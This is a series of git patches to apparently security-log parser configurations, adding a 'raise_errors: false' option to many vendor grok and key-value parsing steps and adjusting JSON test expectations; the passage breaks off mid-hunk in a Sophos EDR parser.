From de6e682a470dd0ccc7e5063c1849ce047e51619e Mon Sep 17 00:00:00 2001 From: "vladyslav.guriev" Date: Tue, 5 Nov 2024 08:28:14 +0200 Subject: [PATCH 001/150] Fix: Add raise_errors false to formats that have different input --- AWS/aws-cloudtrail/ingest/parser.yml | 1 + AWS/aws-guardduty/ingest/parser.yml | 1 + Aruba Network/aruba-os/ingest/parser.yml | 7 +++++++ Azure/azure-network-watcher/ingest/parser.yml | 1 + Azure/azure-windows/ingest/parser.yml | 2 ++ Beats/winlogbeat/ingest/parser.yml | 1 + Beats/winlogbeat/tests/security_event_5140.json | 5 ----- Beats/winlogbeat/tests/security_event_5145.json | 7 ------- CatoNetworks/cato-sase/ingest/parser.yml | 2 ++ Cisco/cisco-esa/ingest/parser.yml | 3 +++ .../cisco-esa/tests/test_attachments_details.json | 6 +----- Cisco/cisco-esa/tests/test_ingest_log2.json | 6 +----- Cisco/cisco-esa/tests/test_ingest_log5.json | 7 +------ Cisco/cisco-esa/tests/test_ingest_log7.json | 3 +-- Cisco/cisco-ios/ingest/parser.yml | 4 ++++ Cisco/cisco-ise/ingest/parser.yml | 8 ++++++++ Cisco/cisco-meraki/ingest/parser.yml | 12 ++++++++++++ Cisco/cisco-nx-os/ingest/parser.yml | 4 ++++ Cisco/cisco-secure-firewall/ingest/parser.yml | 3 +++ Cisco/cisco-secure-web-appliance/ingest/parser.yml | 3 +++ Citrix/citrix-adc/ingest/parser.yml | 5 +++++ CybeReason/malop-json/ingest/parser.yml | 1 + EfficientIP/solidserver-ddi/ingest/parser.yml | 3 +++ Wallix/wallix-bastion/tests/session_integrity.json | 14 ++++++++++---- 24 files changed, 75 insertions(+), 34 deletions(-) diff --git a/AWS/aws-cloudtrail/ingest/parser.yml b/AWS/aws-cloudtrail/ingest/parser.yml index 265f9f7b7..31dcee72d 100644 --- a/AWS/aws-cloudtrail/ingest/parser.yml +++ b/AWS/aws-cloudtrail/ingest/parser.yml @@ -14,6 +14,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.sourceIPAddress output_field: source pattern: "(%{IP:ip}|%{HOSTNAME:domain})" diff --git a/AWS/aws-guardduty/ingest/parser.yml b/AWS/aws-guardduty/ingest/parser.yml index 06512d7b1..7cb4ac969 100644 --- a/AWS/aws-guardduty/ingest/parser.yml +++ b/AWS/aws-guardduty/ingest/parser.yml @@ -13,6 +13,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.type output_field: finding pattern: "%{DATA:threat_purpose}:%{DATA:affected_resource_type}/%{WORD:threat_family_name}(.%{DATA:detection_mecanism})?(!%{DATA:artifact})?" diff --git a/Aruba Network/aruba-os/ingest/parser.yml b/Aruba Network/aruba-os/ingest/parser.yml index 8f38ca817..7c22ea1e7 100644 --- a/Aruba Network/aruba-os/ingest/parser.yml +++ b/Aruba Network/aruba-os/ingest/parser.yml @@ -4,12 +4,14 @@ pipeline: external: name: grok.match properties: + raise_errors: false pattern: '%{DATA:prefix}\:\s*%{USERNAME:obs}\s*\:\s*%{GREEDYDATA:payload}\s*' - name: parse_auth_message external: name: grok.match properties: + raise_errors: false input_field: "parse_message.message.payload" pattern: ".*?User '%{USERNAME:user_name}'.*from %{IP:src_ip}.*" filter: "{{ parse_message.message.prefix.lower() == 'auth' }}" @@ -20,6 +22,7 @@ pipeline: properties: input_field: "parse_message.message.payload" pattern: ".*?from %{IP:src_ip}.*" + raise_errors: false filter: "{{ parse_message.message.prefix.lower() == 'mgr' }}" - name: parse_ssl_message @@ -28,6 +31,7 @@ pipeline: properties: input_field: "parse_message.message.payload" pattern: ".*?from %{IP:src_ip}.*" + raise_errors: false filter: "{{ parse_message.message.prefix.lower() == 'ssl' }}" - name: parse_sntp_message @@ -36,6 +40,7 @@ pipeline: properties: input_field: "parse_message.message.payload" pattern: ".*?at %{IP:src_ip}.*" + raise_errors: false filter: "{{ parse_message.message.prefix.lower() == 'sntp' }}" - name: parse_snmp_message @@ -44,6 +49,7 @@ pipeline: properties: input_field: "parse_message.message.payload" pattern: ".*?from %{IP:src_ip}.*" + raise_errors: false filter: "{{ parse_message.message.prefix.lower() == 'snmp' }}" - name: parse_dhcp_snoop_message @@ -52,6 +58,7 @@ pipeline: properties: input_field: "parse_message.message.payload" pattern: ".*?%{IP:src_ip}.*" + raise_errors: false filter: "{{ parse_message.message.prefix.lower() == 'dhcp-snoop' }}" - name: set_ecs_fields diff --git a/Azure/azure-network-watcher/ingest/parser.yml b/Azure/azure-network-watcher/ingest/parser.yml index edca894ef..f6af50849 100644 --- a/Azure/azure-network-watcher/ingest/parser.yml +++ b/Azure/azure-network-watcher/ingest/parser.yml @@ -9,6 +9,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.get('flow.0')}}" output_field: result pattern: "%{NUMBER:timestamp},%{IP:source_ip},%{IP:destination_ip},%{NUMBER:source_port},%{NUMBER:destination_port},%{PROTOCOL:protocol},%{TRAFFICFLOW:traffic_flow},%{TRAFFICDECISION:traffic_decision}(|,(%{FLOWSTATE:flow_state}|),(%{INT:source_packets}|),(%{INT:source_bytes}|),(%{INT:destination_packets}|),(%{INT:destination_bytes}|))" diff --git a/Azure/azure-windows/ingest/parser.yml b/Azure/azure-windows/ingest/parser.yml index 4a4e76ac7..bfd2e9740 100644 --- a/Azure/azure-windows/ingest/parser.yml +++ b/Azure/azure-windows/ingest/parser.yml @@ -24,6 +24,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_windows_event.message.EventData.SubjectUserName or parse_windows_event.message.EventData.User}}" output_field: result pattern: "(%{USER_WITH_DOMAIN}|%{GREEDYDATA:user_name})" @@ -36,6 +37,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{parse_windows_event.message.EventData.Hashes | lower}}" output_field: result value_sep: "=" diff --git a/Beats/winlogbeat/ingest/parser.yml b/Beats/winlogbeat/ingest/parser.yml index 0ffc5dbf6..7f190c1ff 100644 --- a/Beats/winlogbeat/ingest/parser.yml +++ b/Beats/winlogbeat/ingest/parser.yml @@ -10,6 +10,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{json.event.winlog.event_data.Hashes}}" output_field: hash value_sep: "=" diff --git a/Beats/winlogbeat/tests/security_event_5140.json b/Beats/winlogbeat/tests/security_event_5140.json index cde1d5c3c..8413484f9 100644 --- a/Beats/winlogbeat/tests/security_event_5140.json +++ b/Beats/winlogbeat/tests/security_event_5140.json @@ -93,11 +93,6 @@ "api": "wineventlog", "channel": "Security", "computer_name": "HOST01.company.test", - "event_data": { - "AccessMaskDescription": [ - "Create Child" - ] - }, "event_id": "5140", "keywords": [ "Audit Success" diff --git a/Beats/winlogbeat/tests/security_event_5145.json b/Beats/winlogbeat/tests/security_event_5145.json index 99a17d54f..ec1e78d54 100644 --- a/Beats/winlogbeat/tests/security_event_5145.json +++ b/Beats/winlogbeat/tests/security_event_5145.json @@ -96,13 +96,6 @@ "api": "wineventlog", "channel": "Security", "computer_name": "host01.company.test", - "event_data": { - "AccessMaskDescription": [ - "List Object", - "READ_CONTROL", - "SYNCHRONIZE" - ] - }, "event_id": "5145", "keywords": [ "Audit Success" diff --git a/CatoNetworks/cato-sase/ingest/parser.yml b/CatoNetworks/cato-sase/ingest/parser.yml index c3559d563..73f02ca34 100644 --- a/CatoNetworks/cato-sase/ingest/parser.yml +++ b/CatoNetworks/cato-sase/ingest/parser.yml @@ -19,6 +19,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.output.mitre_attack_tactics}}" output_field: message pattern: '%{DATA:tactic_name_1} \(%{DATA:tactic_id_1}\)\, %{DATA:tactic_name_2} \(%{DATA:tactic_id_2}\)' @@ -28,6 +29,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.output.mitre_attack_techniques}}" output_field: message pattern: '%{DATA:technique_name_1} \(%{DATA:technique_id_1}\)\, %{DATA:technique_name_2} \(%{DATA:technique_id_2}\)' diff --git a/Cisco/cisco-esa/ingest/parser.yml b/Cisco/cisco-esa/ingest/parser.yml index 67b76402f..b20c3d0d7 100644 --- a/Cisco/cisco-esa/ingest/parser.yml +++ b/Cisco/cisco-esa/ingest/parser.yml @@ -32,6 +32,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.ExternalMsgID}}" output_field: message pattern: "<%{MESSAGE_ID}>|%{MESSAGE_ID}" @@ -42,6 +43,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.duser}}" output_field: message pattern: "%{GREEDYDATA:duser_name}@%{GREEDYDATA:duser_domain}" @@ -50,6 +52,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.suser}}" output_field: message pattern: "%{GREEDYDATA:suser_name}@%{GREEDYDATA:suser_domain}" diff --git a/Cisco/cisco-esa/tests/test_attachments_details.json b/Cisco/cisco-esa/tests/test_attachments_details.json index 56ac98c83..448ea5b15 100644 --- a/Cisco/cisco-esa/tests/test_attachments_details.json +++ b/Cisco/cisco-esa/tests/test_attachments_details.json @@ -54,11 +54,7 @@ "domain": { "age": "30 days (or greater)" } - }, - "url": [ - "http://schemas.microsoft.com/office/2004/12/omml", - "http://www.w3.org/TR/REC-html40" - ] + } } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log2.json b/Cisco/cisco-esa/tests/test_ingest_log2.json index afb99f16d..d8d9bc5a6 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log2.json +++ b/Cisco/cisco-esa/tests/test_ingest_log2.json @@ -57,11 +57,7 @@ "domain": { "age": "9 years 3 months 14 days" } - }, - "url": [ - "http://mandrill.appc.cisco.com/track/open.php?u=30372747&id=d57275a6c9df40418a90fd977e3bf506", - "https://bce-demo.appc.cisco.com/sensors/a7b04388-0f6e-11e9-8def-0242ac110002" - ] + } } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log5.json b/Cisco/cisco-esa/tests/test_ingest_log5.json index 553425b45..a85f9845d 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log5.json +++ b/Cisco/cisco-esa/tests/test_ingest_log5.json @@ -51,12 +51,7 @@ "domain": { "age": "30 days (or greater)" } - }, - "url": [ - "https://facebook.com/u/john.doe", - "https://tiktok.com", - "www.twitter.com" - ] + } } }, "email": { diff --git a/Cisco/cisco-esa/tests/test_ingest_log7.json b/Cisco/cisco-esa/tests/test_ingest_log7.json index 29716af19..b77951dcf 100644 --- a/Cisco/cisco-esa/tests/test_ingest_log7.json +++ b/Cisco/cisco-esa/tests/test_ingest_log7.json @@ -54,8 +54,7 @@ "domain": { "age": "30 days (or greater)" } - }, - "url": [] + } } }, "email": { diff --git a/Cisco/cisco-ios/ingest/parser.yml b/Cisco/cisco-ios/ingest/parser.yml index dace57b15..634407c14 100644 --- a/Cisco/cisco-ios/ingest/parser.yml +++ b/Cisco/cisco-ios/ingest/parser.yml @@ -4,6 +4,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false pattern: "(?:%{HOSTNAME:hostname}: )?%{CISCO_HEADER}: %{DATA:description}" custom_patterns: CISCO_HEADER: "%{CISCO_DATESTAMP}: %{MSG_CODE}" @@ -14,6 +15,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{LINEPROTO}|%{LINK}" custom_patterns: @@ -24,6 +26,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{SEC_LOGIN_SUCCESS}|%{SYS_LOGIN_FAILURE}|%{SYS_LOGOUT}|%{SYS_TTY_EXPIRE_TIMER}" custom_patterns: @@ -34,6 +37,7 @@ pipeline: filter: '{{parsed_event.message.facility in ["SEC_LOGIN", "SYS"]}}' - name: parsed_description external: + raise_errors: false name: grok.match properties: input_field: parsed_event.message.description diff --git a/Cisco/cisco-ise/ingest/parser.yml b/Cisco/cisco-ise/ingest/parser.yml index 015a469be..218053f07 100644 --- a/Cisco/cisco-ise/ingest/parser.yml +++ b/Cisco/cisco-ise/ingest/parser.yml @@ -4,6 +4,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: original.message output_field: pre_message pattern: "%{DATA:status}:%{GREEDYDATA:reason_with_kv}" @@ -13,6 +14,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{pre_parsed_event.pre_message.reason_with_kv}}" output_field: time_message pattern: "%{DATA:start_of_msg}: %{DATA:reason},%{GREEDYDATA:end_of_msg}" @@ -22,6 +24,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{grok_timestamp_in_status.time_message.end_of_msg}}" output_field: event_outcome pattern: " MESSAGE=%{DATA:outcome_msg}," @@ -31,6 +34,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{grok_timestamp_in_status.time_message.end_of_msg}}" output_field: event_outcomes pattern: " MESSAGE=%{DATA:outcome_msg} threshold_space = %{DATA:threshold_space}, used_space = %{DATA:used_space}," @@ -40,6 +44,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{pre_parsed_event.pre_message.reason_with_kv}}" output_field: message pattern: "%{DATA:reason}:%{GREEDYDATA:kv}" @@ -49,6 +54,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.reason.strip()}}" output_field: conf_result pattern: "Configuration %{WORD:change}" @@ -58,6 +64,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{parsed_event.message.kv.strip()}}" output_field: result value_sep: "=" @@ -68,6 +75,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: '{{parsed_kv_sentence.result.get("NAS Identifier")}}' output_field: adress_mac pattern: "%{MAC:adress}:%{GREEDYDATA:word}" diff --git a/Cisco/cisco-meraki/ingest/parser.yml b/Cisco/cisco-meraki/ingest/parser.yml index 7f3baaa74..8b06aa6bc 100644 --- a/Cisco/cisco-meraki/ingest/parser.yml +++ b/Cisco/cisco-meraki/ingest/parser.yml @@ -4,6 +4,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{original.message}}" output_field: message pattern: >- @@ -20,6 +21,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message value_sep: "=" @@ -29,6 +31,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{kv_part_message.message.src}}" output_field: message pattern: "^%{IP:src_ip}:%{NUMBER:src_port}$" @@ -37,6 +40,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{kv_part_message.message.dst}}" output_field: message pattern: "^%{IP:dst_ip}:%{NUMBER:dst_port}$" @@ -52,6 +56,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: ^%{WORD:action}\s%{GREEDYDATA}$ @@ -62,6 +67,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: ^(%{WORD:log_subtype}|type=%{WORD:log_subtype})\s%{GREEDYDATA}$ @@ -72,6 +78,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- @@ -86,6 +93,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- @@ -99,6 +107,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- @@ -112,6 +121,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- @@ -124,6 +134,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- @@ -139,6 +150,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{grok_header.message.kv_part}}" output_field: message pattern: >- diff --git a/Cisco/cisco-nx-os/ingest/parser.yml b/Cisco/cisco-nx-os/ingest/parser.yml index 5b8fe2aee..b9f586e96 100644 --- a/Cisco/cisco-nx-os/ingest/parser.yml +++ b/Cisco/cisco-nx-os/ingest/parser.yml @@ -14,6 +14,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{ETHPORT_IF_DOWN}|%{ETHPORT_IF_UP}|%{ETHPORT_IF}|%{ETHPORT_CONTROL}|%{ETHPORT_LAN}|%{ETHPORT_TRANSCEIVER}|%{ETHPORT_CHANNEL}" custom_patterns: @@ -30,6 +31,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{PAM_MESSAGE}|%{FILE_OPEN_FAILURE}" custom_patterns: @@ -42,6 +44,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{VSHD_CONFIG}|%{VSHD_CMD_EXEC}" custom_patterns: @@ -53,6 +56,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.description pattern: "%{ARP_DUP}" custom_patterns: diff --git a/Cisco/cisco-secure-firewall/ingest/parser.yml b/Cisco/cisco-secure-firewall/ingest/parser.yml index 04ce99510..00b0ffdce 100644 --- a/Cisco/cisco-secure-firewall/ingest/parser.yml +++ b/Cisco/cisco-secure-firewall/ingest/parser.yml @@ -4,6 +4,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "original.message" output_field: pre_message pattern: '((<[0-9]+>)?(%{SYSLOGTIMESTAMP:timestamp}|%{TIMESTAMP_ISO8601:timestamp})?(%{IP:log_ip})?(%{SPACE}%{DATA:log_hostname}%{SPACE})?(\:)?\%%{PRODUCT_NAME:product}\-[0-9]{1}\-%{MESSAGE_NUMBER:message_number_grok}\: %{GREEDYDATA:raw_message})|\s?%{GREEDYDATA:raw_message}' @@ -16,6 +17,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{pre_parsing.pre_message.raw_message}}" output_field: message pattern: "%{Group_1}|%{Group_2}|%{Group_3}|%{Group_4}|%{Group_5}|%{Group_6}|%{Group_7}|%{Group_8}|%{Group_9}|%{Group_10}" @@ -169,6 +171,7 @@ pipeline: external: name: kv.parse-kv properties: + raise_errors: false input_field: "{{pre_parsing.pre_message.raw_message}}" output_field: parse_kv2_field value_sep: ':\s' diff --git a/Cisco/cisco-secure-web-appliance/ingest/parser.yml b/Cisco/cisco-secure-web-appliance/ingest/parser.yml index 18e6dd0c1..6f782efa3 100644 --- a/Cisco/cisco-secure-web-appliance/ingest/parser.yml +++ b/Cisco/cisco-secure-web-appliance/ingest/parser.yml @@ -4,6 +4,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: original.message output_field: message pattern: '%{PREFIX}%{NUMBER:timestamp}\s+%{NUMBER:elapsed}\s+%{IP:source_ip}\s+%{WORD:code}/%{NUMBER:status}\s+%{NUMBER:http_response_bytes}\s+%{WORD:method}\s+%{NOTSPACE:url}\s+%{NOTSPACE:username}\s+%{NOTSPACE:hierarchy_code}/(%{IP:peerhostip}|%{NOTSPACE:peerhost})\s+%{NOTSPACE:mime_type}\s+%{NOTSPACE:acl_decision}\s+<%{VERDICT:scanning_verdict_information}>\s+%{DATA:user_agent}.*' @@ -22,6 +23,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: parsed_event.message.acl_decision output_field: result pattern: "%{WORD:decision_tag}-%{WORD:policy_group_name}-%{WORD:policy_identity}-%{WORD:outbound_malware_scanning_policy}-%{WORD:data_security_policy}-%{WORD:external_dlp_policy}-%{WORD:routing_policy}" @@ -30,6 +32,7 @@ pipeline: external: name: dsv.parse-dsv properties: + raise_errors: false input_field: "{{parsed_event.message.scanning_verdict_information}}" output_field: results columnnames: diff --git a/Citrix/citrix-adc/ingest/parser.yml b/Citrix/citrix-adc/ingest/parser.yml index 9c6c377a7..712394227 100644 --- a/Citrix/citrix-adc/ingest/parser.yml +++ b/Citrix/citrix-adc/ingest/parser.yml @@ -12,6 +12,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false output_field: message pattern: '\"?\s*%{HEADER:header}\s+:\s+%{WORD:mode}\s+%{WORD:type} %{WORD:message_type} %{NUMBER:n1} %{NUMBER:n2} :\s+%{GREEDYDATA:payload}\"?' custom_patterns: @@ -44,6 +45,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_audit_header.message.payload}}" output_field: message pattern: "%{SOURCE}%{SEP}(%{VSERVER}%{SEP})?(%{NAT}%{SEP})?%{DEST}.*%{BYTES_SEND}.*%{BYTES_RECV}.*" @@ -60,6 +62,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_audit_header.message.payload}}" output_field: message pattern: "%{OPTION_1}|%{OPTION_2}|%{OPTION_3}" @@ -73,6 +76,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_audit_header.message.payload}}" output_field: message pattern: ".*" @@ -83,6 +87,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_audit_header.message.payload}}" output_field: message pattern: ".*ClientIP %{IP:src_ip}.*ClientPort %{POSINT:src_port}.*VserverServiceIP %{IP:vserver_ip}.*VserverServicePort %{POSINT:vserver_port}.*ClientVersion %{WORD:tls_version}.*CipherSuite %{CIPHER_SUITE:tls_suite}.*" diff --git a/CybeReason/malop-json/ingest/parser.yml b/CybeReason/malop-json/ingest/parser.yml index 80803a753..8af47763d 100644 --- a/CybeReason/malop-json/ingest/parser.yml +++ b/CybeReason/malop-json/ingest/parser.yml @@ -35,6 +35,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.name}}" output_field: technique pattern: "%{TID:id} - %{DATA:name} : %{DATA}" diff --git a/EfficientIP/solidserver-ddi/ingest/parser.yml b/EfficientIP/solidserver-ddi/ingest/parser.yml index 3c5ddd91e..219f81146 100644 --- a/EfficientIP/solidserver-ddi/ingest/parser.yml +++ b/EfficientIP/solidserver-ddi/ingest/parser.yml @@ -4,6 +4,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false output_field: message pattern: "%{EFFICIENTIP_DNS_QUERY}|%{EFFICIENTIP_DNS_ANSWER_1}|%{EFFICIENTIP_DNS_ANSWER_DEFAULT}|%{EFFICIENTIP_DNS_UPDATING_ZONE}|%{EFFICIENTIP_DNS_GUARDIAN}|%{EFFICIENTIP_DNS_GUARDIAN_LISTLOG}|%{EFFICIENTIP_RPZ_TRANSFER}|%{EFFICIENTIP_RPZ_ZONE}|%{EFFICIENTIP_RPZ_QNAME}|%{EFFICIENTIP_DNS_ERROR}|%{EFFICIENTIP_DNS_FORMAT_ERROR}|%{EFFICIENTIP_DNS_RECEIVED_NOTIFY}" custom_patterns: @@ -40,6 +41,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_event.message.dns_records}}" output_field: message pattern: ".*?%{DNS_RECORD_HTTPS}.*" @@ -52,6 +54,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_event.message.dns_records}}" output_field: message pattern: ".*?%{DNS_RECORD_RRSIG}.*" diff --git a/Wallix/wallix-bastion/tests/session_integrity.json b/Wallix/wallix-bastion/tests/session_integrity.json index 39e8a6363..1c01481e9 100644 --- a/Wallix/wallix-bastion/tests/session_integrity.json +++ b/Wallix/wallix-bastion/tests/session_integrity.json @@ -6,13 +6,19 @@ "message": "[sessionintegrity] session_uid=\"1830c403be7caf0c00505688c380\" status=\"failed\" type=\"SSH_SHELL_SESSION\" user=\"adm@CORP.NET@1.1.1.1\" target=\"domain@local@target01.corp.net:SSH_1\" begin=\"2022-08-19 11:31:17\" end=\"2022-08-19 11:32:50\" files=[/var/wab/remote/recorded/ssh/2022-08-19/182b5714b466cba10050568e16d9,adm@CORP.NET@1.1.1.1,domain@target01.corp.net,20220819-113117,foo-bastion-bar.corp.net,1805.ttyrec]", "event": { "action": "SSH_SHELL_SESSION", - "category": ["session"], + "category": [ + "session" + ], "dataset": "session_integrity", "outcome": "failure", - "type": ["info"] + "type": [ + "info" + ] }, "related": { - "user": ["adm@CORP.NET@1.1.1.1"] + "user": [ + "adm@CORP.NET@1.1.1.1" + ] }, "user": { "name": "adm@CORP.NET@1.1.1.1" @@ -21,4 +27,4 @@ "type": "SSH_SHELL_SESSION" } } -} +} \ No newline at end of file From cb3e8051f3659825e515c09a49a008d51cdf033f Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Tue, 5 Nov 2024 17:14:08 +0200 Subject: [PATCH 002/150] Add connector info to VadeSecure M365 --- VadeSecure/vade_secure_m365/_meta/manifest.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/VadeSecure/vade_secure_m365/_meta/manifest.yml b/VadeSecure/vade_secure_m365/_meta/manifest.yml index 8c6e799a6..da4658b6a 100644 --- a/VadeSecure/vade_secure_m365/_meta/manifest.yml +++ b/VadeSecure/vade_secure_m365/_meta/manifest.yml @@ -1,6 +1,8 @@ uuid: e4a758fc-7620-49e6-b8ed-b7fb3d7fa232 name: Vade for M365 slug: vade-m365 +automation_connector_uuid: aa1f6d1a-8821-467f-9801-a5293ed37616 +automation_module_uuid: 1411df5b-5de1-40bd-a988-725cfe692aff description: >- Vade for M365 offers all protections from Vade to our Microsoft 365 Email service data_sources: From e3efa726bbbc5e423677c855d3287a3d8d717001 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 6 Nov 2024 12:26:50 +0200 Subject: [PATCH 003/150] Add `raise_errors` --- RSA/rsa-securid/ingest/parser.yml | 1 + Retarus/retarus_email_security/ingest/parser.yml | 2 ++ .../skyhigh_secure_web_gateway/ingest/parser.yml | 1 + SonicWall/sonicwall-fw/ingest/parser.yml | 2 ++ Sophos/sophos edr/ingest/parser.yml | 5 +++++ Squid/squid/ingest/parser.yml | 1 + Systancia/cleanroom/ingest/parser.yml | 1 + Tehtris/tehtris-edr/ingest/parser.yml | 1 + ThinkstCanary/thinkst-canary/ingest/parser.yml | 1 + Umbrella/umbrella-proxy/ingest/parser.yml | 1 + Veeam/veeam_backup/ingest/parser.yml | 1 + Wallix/wallix-bastion/ingest/parser.yml | 1 + Wallix/wallix-bastion/tests/cron.json | 3 +-- Wallix/wallix-bastion/tests/pam_unix.json | 3 +-- WatchGuard/watchguard-firebox/ingest/parser.yml | 1 + Windows/windows/ingest/parser.yml | 8 ++++++++ WithSecure/withsecure-elements/ingest/parser.yml | 2 ++ 17 files changed, 31 insertions(+), 4 deletions(-) diff --git a/RSA/rsa-securid/ingest/parser.yml b/RSA/rsa-securid/ingest/parser.yml index c70fee596..451c6f163 100644 --- a/RSA/rsa-securid/ingest/parser.yml +++ b/RSA/rsa-securid/ingest/parser.yml @@ -4,6 +4,7 @@ pipeline: external: name: dsv.parse-dsv properties: + raise_errors: false input_field: original.message output_field: message columnnames: diff --git a/Retarus/retarus_email_security/ingest/parser.yml b/Retarus/retarus_email_security/ingest/parser.yml index 6bd68803a..f55fa8ea7 100644 --- a/Retarus/retarus_email_security/ingest/parser.yml +++ b/Retarus/retarus_email_security/ingest/parser.yml @@ -7,6 +7,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.sender output_field: sender pattern: "^%{GREEDYDATA:username}@%{GREEDYDATA:domain}$" @@ -15,6 +16,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: json_event.message.recipient output_field: recipient pattern: "^%{GREEDYDATA:username}@%{GREEDYDATA:domain}$" diff --git a/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml b/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml index 9fc2ec259..20b07e5f4 100644 --- a/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml +++ b/SkyhighSecurity/skyhigh_secure_web_gateway/ingest/parser.yml @@ -28,6 +28,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parse_kv.message.http_request_first_line}}" output_field: message pattern: "%{WORD:http_method} %{URL:url} HTTP/%{NUMBER:http_version}" diff --git a/SonicWall/sonicwall-fw/ingest/parser.yml b/SonicWall/sonicwall-fw/ingest/parser.yml index 8a913cd4e..03aa0ed21 100644 --- a/SonicWall/sonicwall-fw/ingest/parser.yml +++ b/SonicWall/sonicwall-fw/ingest/parser.yml @@ -35,6 +35,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.susr}}" output_field: result pattern: "(%{USER_WITH_DOMAIN}|%{GREEDYDATA:user_name})" @@ -47,6 +48,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{parsed_event.message.msg}}" output_field: result pattern: "(%{GREEDYDATA}[F|f]ilename: %{FILE:filename}%{GREEDYDATA})" diff --git a/Sophos/sophos edr/ingest/parser.yml b/Sophos/sophos edr/ingest/parser.yml index f7dc22739..c4779fa3f 100644 --- a/Sophos/sophos edr/ingest/parser.yml +++ b/Sophos/sophos edr/ingest/parser.yml @@ -9,6 +9,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: 'Access was blocked to "%{URL:url}" because of "%{WORD:rulename}".' @@ -19,6 +20,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "Controlled application %{WORD}: %{GREEDYDATA:process_title}" @@ -27,6 +29,7 @@ pipeline: - external: name: grok.match properties: + raise_errors: false input_field: "{{parse_json.message.name}}" output_field: message pattern: "%{REMOVABLE_STORAGE}|%{STORAGE}" @@ -38,6 +41,7 @@ pipeline: - external: name: grok.match properties: + 